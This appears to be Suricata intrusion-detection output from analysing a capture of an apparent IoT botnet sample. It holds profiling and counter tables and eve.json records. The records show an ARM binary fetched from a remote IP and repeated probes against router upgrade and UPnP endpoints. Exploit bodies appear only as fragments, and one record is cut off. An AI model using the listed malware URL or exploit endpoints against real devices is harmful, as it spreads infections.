Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       1          1062        136285912     7743199852    5851165450       6213.9b    2.22
 IPv4       6         47687          4292412     7752811116    5742432422     273839.4b   97.78
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       1          1062           114822        3214580        153659        163.2m    1.02
TMM_FLOWWORKER              IPv4       6         47687           113592       31113594        317063         15.1b   94.76
TMM_RECEIVEPCAPFILE         IPv4       1          1062             4422          30086          4699          5.0m    0.03
TMM_RECEIVEPCAPFILE         IPv4       6         47510             4406       19661880          5414        257.3m    1.61
TMM_DECODEPCAPFILE          IPv4       1          1062             4532        5007518         24122         25.6m    0.16
TMM_DECODEPCAPFILE          IPv4       6         47510             4538        5306064          8092        384.5m    2.41

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       1           473             4744          31410          6620          3.1m  0.02  
flow                    IPv4       6         47510             4596       30414694          7288        346.3m  2.47  
stream                  IPv4       6         47687             4574        6718192          6692        319.1m  2.28  
detect                  IPv4       1          1062            96132        3186520        138022        146.6m  1.05  
detect                  IPv4       6         47687            76586       18262786        271624         13.0b  92.54 
tcp-prune               IPv4       6         47687             4420        2132378          4819        229.8m  1.64  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6             4             9488          34162         17481         69.9k  100.00
Proto detect            IPv4       6           151             4556         423622         12199          1.8m

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       1             1           107098         107098        107098        107.1k  0.31  
LOGGER_ALERT_FAST           IPv4       6             7            74776         156692         93312        653.2k  1.86  
LOGGER_UNIFIED2             IPv4       1             1            47048          47048         47048         47.0k  0.13  
LOGGER_UNIFIED2             IPv4       6             7            46786         151488         70272        491.9k  1.40  
LOGGER_JSON_ALERT           IPv4       1             1           106018         106018        106018        106.0k  0.30  
LOGGER_JSON_ALERT           IPv4       6             7            89410       24899216       3653635         25.6m  72.90 
LOGGER_JSON_HTTP            IPv4       6            42            61016         568996        137931          5.8m  16.51 
LOGGER_JSON_FILE            IPv4       6            42            37756         224470         54936          2.3m  6.58  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       1          1062             4806         107570         10336        11.0m  13.39 
payload                           IPv4       6           582             4422         408650         51072        29.7m  36.26 
stream                            IPv4       6           582             4432        1039328         29148        17.0m  20.69 
http_uri                          IPv4       6            42            11536         441586         33674         1.4m  1.73  
http_request_line                 IPv4       6            42             7190          36622         13458       565.3k  0.69  
http_client_body                  IPv4       6            42             6266         517740         76488         3.2m  3.92  
http_header (request)             IPv4       6            42            17160         591868         78854         3.3m  4.04  
http_header (request trailer)     IPv4       6            41             4518          26778          9642       395.3k  0.48  
http_header_names (request)       IPv4       6            42            10532          33450         15818       664.4k  0.81  
http_accept (request)             IPv4       6            42             5594          28652         10749       451.5k  0.55  
http_referer (request)            IPv4       6            42             5194          13074          9381       394.0k  0.48  
http_content_len (request)        IPv4       6            42             5578          30130         11171       469.2k  0.57  
http_content_type (request)       IPv4       6            42             5518          28636         10250       430.5k  0.53  
http_protocol (request)           IPv4       6            42             6634          27696         10597       445.1k  0.54  
http_start (request)              IPv4       6            42            12280         434796         29036         1.2m  1.49  
http_raw_header (request)         IPv4       6            42            13070          53868         26474         1.1m  1.36  
http_method                       IPv4       6            42             6746         433398         32421         1.4m  1.66  
http_cookie (request)             IPv4       6            42             5314          14218          9609       403.6k  0.49  
http_raw_uri                      IPv4       6            42             5968          22406         11258       472.9k  0.58  
http_user_agent                   IPv4       6            42             9098          28742         11498       482.9k  0.59  
http_host                         IPv4       6            42             4556          21912          9385       394.2k  0.48  
http_response_line                IPv4       6             3             9396          14384         12471        37.4k  0.05  
http_header (response)            IPv4       6             3            43234          68688         52497       157.5k  0.19  
http_header (response trailer)    IPv4       6             1             5116           5116          5116         5.1k  0.01  
http_content_type (response)      IPv4       6             3             9050          15372         12168        36.5k  0.04  
http_raw_header (response)        IPv4       6            44             6204          22282          7550       332.2k  0.41  
http_cookie (response)            IPv4       6             3             5004           5794          5320        16.0k  0.02  
http_stat_code                    IPv4       6             3             6184           6478          6356        19.1k  0.02  
file_data (http response)         IPv4       6            43             4464        1640670        151280         6.5m  7.94  
Total                             IPv4                  3084                                         26580        82.0m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       1          1045             5060         132078         20716         21.6m  0.20  
PROF_DETECT_IPONLY          IPv4       6         46211             5078       15985930         48864          2.3b  20.53 
PROF_DETECT_RULES           IPv4       1          1062             4406          57014          7405          7.9m  0.07  
PROF_DETECT_RULES           IPv4       6         47687             4406       15575186        120442          5.7b  52.21 
PROF_DETECT_STATEFUL_START    IPv4       6            78             8910       12678460        363585         28.4m  0.26  
PROF_DETECT_STATEFUL_CONT    IPv4       1          1062             4386        3057786          7834          8.3m  0.08  
PROF_DETECT_STATEFUL_CONT    IPv4       6         47687             4380        7243146          5120        244.2m  2.22  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           163             4458          18770          4884        796.3k  0.01  
PROF_DETECT_PREFILTER       IPv4       1          1062            31780         135312         39702         42.2m  0.38  
PROF_DETECT_PREFILTER       IPv4       6         47687            13380       13682962         19807        944.6m  8.59  
PROF_DETECT_PF_PAYLOAD      IPv4       1          1062            13728         116444         19796         21.0m  0.19  
PROF_DETECT_PF_PAYLOAD      IPv4       6           582            22198        1170598         94495         55.0m  0.50  
PROF_DETECT_PF_TX           IPv4       6           163             4478       13582422        294244         48.0m  0.44  
PROF_DETECT_PF_SORT1        IPv4       1            13             4512          40518          7814        101.6k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6           333             4444          21976          5811          1.9m  0.02  
PROF_DETECT_PF_SORT2        IPv4       1          1062             4396          36788          4866          5.2m  0.05  
PROF_DETECT_PF_SORT2        IPv4       6         47687             4384        1798990          4901        233.8m  2.13  
PROF_DETECT_NONMPMLIST      IPv4       1          1062             4402         107528          5142          5.5m  0.05  
PROF_DETECT_NONMPMLIST      IPv4       6         47687             4398        7226578          5363        255.8m  2.33  
PROF_DETECT_ALERT           IPv4       1          1062             4406          27202          4726          5.0m  0.05  
PROF_DETECT_ALERT           IPv4       6         47687             4400        4425860          4918        234.5m  2.13  
PROF_DETECT_CLEANUP         IPv4       1          1062             4406          62676          4833          5.1m  0.05  
PROF_DETECT_CLEANUP         IPv4       6         47687             4442       13959912          6215        296.4m  2.69  
PROF_DETECT_GETSGH          IPv4       1          1062             4438          29594          4917          5.2m  0.05  
PROF_DETECT_GETSGH          IPv4       6         47687             4420        6971062         11076        528.2m  4.80  

------------------------------------------------------------------------------------
Date: 9/23/2019 -- 11:17:10 (uptime: 0d, 00h 00m 08s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 48577
decoder.bytes                              | Total                     | 3159002
decoder.ipv4                               | Total                     | 48572
decoder.ethernet                           | Total                     | 48577
decoder.tcp                                | Total                     | 47510
decoder.icmpv4                             | Total                     | 1062
decoder.avg_pkt_size                       | Total                     | 65
decoder.max_pkt_size                       | Total                     | 1153
flow.tcp                                   | Total                     | 37544
tcp.sessions                               | Total                     | 37544
tcp.syn                                    | Total                     | 37553
tcp.synack                                 | Total                     | 223
tcp.rst                                    | Total                     | 1265
tcp.overlap                                | Total                     | 113
detect.alert                               | Total                     | 6
detect.nonmpm_list                         | Total                     | 15
detect.fnonmpm_list                        | Total                     | 11
detect.match_list                          | Total                     | 11
app_layer.flow.http                        | Total                     | 1
app_layer.tx.http                          | Total                     | 7
app_layer.flow.failed_tcp                  | Total                     | 23
flow.spare                                 | Total                     | 9991
flow_mgr.flows_checked                     | Total                     | 1
flow_mgr.flows_notimeout                   | Total                     | 1
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65535
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 12483816
tcp.reassembly_memuse                      | Total                     | 323584
http.memuse                                | Total                     | 712196
flow.memuse                                | Total                     | 17034784
------------------------------------------------------------------------------------
Date: 9/23/2019 -- 11:17:10 (uptime: 0d, 00h 00m 08s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 48577
decoder.bytes                              | Total                     | 3159002
decoder.ipv4                               | Total                     | 48572
decoder.ethernet                           | Total                     | 48577
decoder.tcp                                | Total                     | 47510
decoder.icmpv4                             | Total                     | 1062
decoder.avg_pkt_size                       | Total                     | 65
decoder.max_pkt_size                       | Total                     | 1153
flow.tcp                                   | Total                     | 44585
tcp.sessions                               | Total                     | 44585
tcp.syn                                    | Total                     | 44601
tcp.synack                                 | Total                     | 257
tcp.rst                                    | Total                     | 1508
tcp.overlap                                | Total                     | 147
detect.alert                               | Total                     | 8
detect.nonmpm_list                         | Total                     | 15
detect.fnonmpm_list                        | Total                     | 11
detect.match_list                          | Total                     | 11
app_layer.flow.http                        | Total                     | 3
app_layer.tx.http                          | Total                     | 82
app_layer.flow.failed_tcp                  | Total                     | 30
flow.spare                                 | Total                     | 9991
flow_mgr.flows_checked                     | Total                     | 1
flow_mgr.flows_notimeout                   | Total                     | 1
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65535
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 17034784

{"timestamp":"2019-09-19T08:07:12.685917+0000","flow_id":855884828794989,"pcap_cnt":21,"event_type":"alert","src_ip":"192.168.122.105","src_port":53098,"dest_ip":"192.236.178.80","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2025125,"rev":1,"signature":"ET INFO ARM7 File Download Request from IP Address","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2019-09-19T08:07:12.781794+0000","flow_id":855884828794989,"pcap_cnt":59,"event_type":"alert","src_ip":"192.236.178.80","src_port":80,"dest_ip":"192.168.122.105","dest_port":53098,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019240,"rev":14,"signature":"ET POLICY Executable and linking format (ELF) file download Over HTTP","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2019-09-19T08:07:12.804318+0000","flow_id":855884828794989,"pcap_cnt":84,"event_type":"http","src_ip":"192.168.122.105","src_port":53098,"dest_ip":"192.236.178.80","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"192.236.178.80","url":"\/dark_bins\/dark.arm7","http_user_agent":"Wget\/1.19.4 (linux-gnueabihf)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-19T08:07:12.835888+0000","flow_id":855884828794989,"pcap_cnt":85,"event_type":"fileinfo","src_ip":"192.236.178.80","src_port":80,"dest_ip":"192.168.122.105","dest_port":53098,"proto":"TCP","http":{"hostname":"192.236.178.80","url":"\/dark_bins\/dark.arm7","http_user_agent":"Wget\/1.19.4 (linux-gnueabihf)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":54888},"app_proto":"http","fileinfo":{"filename":"\/dark_bins\/dark.arm7","gaps":false,"state":"CLOSED","stored":false,"size":54888,"tx_id":0}}
{"timestamp":"2019-09-19T08:07:13.416654+0000","flow_id":969731527009741,"pcap_cnt":1320,"event_type":"alert","src_ip":"5.157.42.154","src_port":52869,"dest_ip":"192.168.122.105","dest_port":53291,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2400000,"rev":2652,"signature":"ET DROP Spamhaus DROP Listed Traffic Inbound group 1","category":"Misc Attack","severity":2}}
{"timestamp":"2019-09-19T08:07:23.820889+0000","flow_id":1825130099201547,"pcap_cnt":7878,"event_type":"http","src_ip":"192.168.122.105","src_port":49346,"dest_ip":"197.246.34.89","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:07:23.820889+0000","flow_id":1825130099201547,"pcap_cnt":7878,"event_type":"http","src_ip":"192.168.122.105","src_port":49346,"dest_ip":"197.246.34.89","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:07:23.820889+0000","flow_id":1825130099201547,"pcap_cnt":7878,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":49346,"dest_ip":"197.246.34.89","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:07:23.994926+0000","flow_id":1055789787374910,"pcap_cnt":7912,"event_type":"http","src_ip":"192.168.122.105","src_port":39650,"dest_ip":"197.246.202.89","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:07:23.994926+0000","flow_id":1055789787374910,"pcap_cnt":7912,"event_type":"http","src_ip":"192.168.122.105","src_port":39650,"dest_ip":"197.246.202.89","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:07:23.994926+0000","flow_id":1055789787374910,"pcap_cnt":7912,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":39650,"dest_ip":"197.246.202.89","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:07:38.336714+0000","flow_id":313363889028149,"pcap_cnt":18364,"event_type":"alert","src_ip":"161.0.7.66","src_port":52869,"dest_ip":"192.168.122.105","dest_port":53291,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2400012,"rev":2652,"signature":"ET DROP Spamhaus DROP Listed Traffic Inbound group 13","category":"Misc Attack","severity":2}}
{"timestamp":"2019-09-19T08:07:45.920773+0000","flow_id":194099090107508,"pcap_cnt":24003,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":59454,"dest_ip":"60.184.170.69","dest_port":52869,"proto":"TCP","http":{"url":"\/picsdesc.xml","http_user_agent":"Hello-World","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/picsdesc.xml","gaps":false,"state":"CLOSED","stored":false,"size":630,"tx_id":0}}
{"timestamp":"2019-09-19T08:07:52.717056+0000","flow_id":142651824822169,"pcap_cnt":28528,"event_type":"alert","src_ip":"181.177.97.189","src_port":52869,"dest_ip":"192.168.122.105","dest_port":53291,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2400015,"rev":2652,"signature":"ET DROP Spamhaus DROP Listed Traffic Inbound group 16","category":"Misc Attack","severity":2}}
{"timestamp":"2019-09-19T08:08:05.373812+0000","flow_id":1043604967876021,"pcap_cnt":36831,"event_type":"alert","src_ip":"160.124.224.70","dest_ip":"192.168.122.105","proto":"ICMP","icmp_type":3,"icmp_code":10,"alert":{"action":"allowed","gid":1,"signature_id":2400012,"rev":2652,"signature":"ET DROP Spamhaus DROP Listed Traffic Inbound group 13","category":"Misc Attack","severity":2}}
{"timestamp":"2019-09-19T08:08:14.165663+0000","flow_id":337140830330017,"pcap_cnt":44149,"event_type":"alert","src_ip":"107.182.246.15","src_port":52869,"dest_ip":"192.168.122.105","dest_port":53291,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2400005,"rev":2652,"signature":"ET DROP Spamhaus DROP Listed Traffic Inbound group 6","category":"Misc Attack","severity":2}}
{"timestamp":"2019-09-19T08:08:18.021446+0000","flow_id":1087529599189631,"pcap_cnt":47387,"event_type":"alert","src_ip":"160.124.82.153","src_port":52869,"dest_ip":"192.168.122.105","dest_port":53291,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2400012,"rev":2652,"signature":"ET DROP Spamhaus DROP Listed Traffic Inbound group 13","category":"Misc Attack","severity":2}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1127298848529354,"event_type":"http","src_ip":"192.168.122.105","src_port":41374,"dest_ip":"156.238.44.17","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1127298848529354,"event_type":"http","src_ip":"192.168.122.105","src_port":41374,"dest_ip":"156.238.44.17","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1127298848529354,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":41374,"dest_ip":"156.238.44.17","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1973078840453593,"event_type":"http","src_ip":"192.168.122.105","src_port":37808,"dest_ip":"156.238.62.190","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1973078840453593,"event_type":"http","src_ip":"192.168.122.105","src_port":37808,"dest_ip":"156.238.62.190","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1973078840453593,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":37808,"dest_ip":"156.238.62.190","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1002347510443363,"event_type":"http","src_ip":"192.168.122.105","src_port":39890,"dest_ip":"197.234.46.162","dest_port":52869,"proto":"TCP","tx_id":0,"http":{"url":"\/picsdesc.xml","http_user_agent":"Hello-World"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1002347510443363,"event_type":"http","src_ip":"192.168.122.105","src_port":39890,"dest_ip":"197.234.46.162","dest_port":52869,"proto":"TCP","tx_id":1,"http":{}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1002347510443363,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":39890,"dest_ip":"197.234.46.162","dest_port":52869,"proto":"TCP","http":{"url":"\/picsdesc.xml","http_user_agent":"Hello-World","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/picsdesc.xml","gaps":false,"state":"CLOSED","stored":false,"size":630,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1992805625803464,"event_type":"http","src_ip":"192.168.122.105","src_port":55670,"dest_ip":"103.37.249.11","dest_port":52869,"proto":"TCP","tx_id":0,"http":{"url":"\/picsdesc.xml","http_user_agent":"Hello-World"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1992805625803464,"event_type":"http","src_ip":"192.168.122.105","src_port":55670,"dest_ip":"103.37.249.11","dest_port":52869,"proto":"TCP","tx_id":1,"http":{}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1992805625803464,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":55670,"dest_ip":"103.37.249.11","dest_port":52869,"proto":"TCP","http":{"url":"\/picsdesc.xml","http_user_agent":"Hello-World","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/picsdesc.xml","gaps":false,"state":"CLOSED","stored":false,"size":630,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1571482218889850,"event_type":"http","src_ip":"192.168.122.105","src_port":48248,"dest_ip":"156.226.77.103","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1571482218889850,"event_type":"http","src_ip":"192.168.122.105","src_port":48248,"dest_ip":"156.226.77.103","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1571482218889850,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":48248,"dest_ip":"156.226.77.103","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":305057421013190,"event_type":"http","src_ip":"192.168.122.105","src_port":48638,"dest_ip":"156.224.3.224","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":305057421013190,"event_type":"http","src_ip":"192.168.122.105","src_port":48638,"dest_ip":"156.224.3.224","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":305057421013190,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":48638,"dest_ip":"156.224.3.224","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":307786875136975,"event_type":"http","src_ip":"192.168.122.105","src_port":52332,"dest_ip":"156.224.225.80","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":307786875136975,"event_type":"http","src_ip":"192.168.122.105","src_port":52332,"dest_ip":"156.224.225.80","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":307786875136975,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":52332,"dest_ip":"156.224.225.80","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":873545735915503,"event_type":"http","src_ip":"192.168.122.105","src_port":41304,"dest_ip":"156.224.144.211","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":873545735915503,"event_type":"http","src_ip":"192.168.122.105","src_port":41304,"dest_ip":"156.224.144.211","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":873545735915503,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":41304,"dest_ip":"156.224.144.211","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1018522357801610,"event_type":"http","src_ip":"192.168.122.105","src_port":57628,"dest_ip":"156.227.240.156","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1018522357801610,"event_type":"http","src_ip":"192.168.122.105","src_port":57628,"dest_ip":"156.227.240.156","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1018522357801610,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":57628,"dest_ip":"156.227.240.156","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1443790692724091,"event_type":"http","src_ip":"192.168.122.105","src_port":37460,"dest_ip":"156.241.113.204","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1443790692724091,"event_type":"http","src_ip":"192.168.122.105","src_port":37460,"dest_ip":"156.241.113.204","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1443790692724091,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":37460,"dest_ip":"156.241.113.204","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.7

  --------------------------------------------------------------------------------------------------------------------------------
  Date: 9/23/2019 -- 11:17:10
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             5776742         600             600             2220814         9627.00         9627.00         0.00           
  threshold        100016          6               6               25578           16669.00        16669.00        0.00           
  content          9426096         1242            188             431378          7589.00         6720.00         7744.00        
  pcre             1030144         16              4               749392          64384.00        35506.00        74009.00       
  byte_test        138130          23              8               36242           6005.00         4503.00         6807.00        
  flowbits         346036          61              17              22004           5672.00         7853.00         4830.00        
  urilen           162472          30              10              20242           5415.00         5092.00         5577.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             5776742         600             600             2220814         9627.00         9627.00         0.00           
  flowbits         217550          45              1               7254            4834.00         5024.00         4830.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3254598         494             8               75812           6588.00         25078.00        6283.00        
  byte_test        138130          23              8               36242           6005.00         4503.00         6807.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
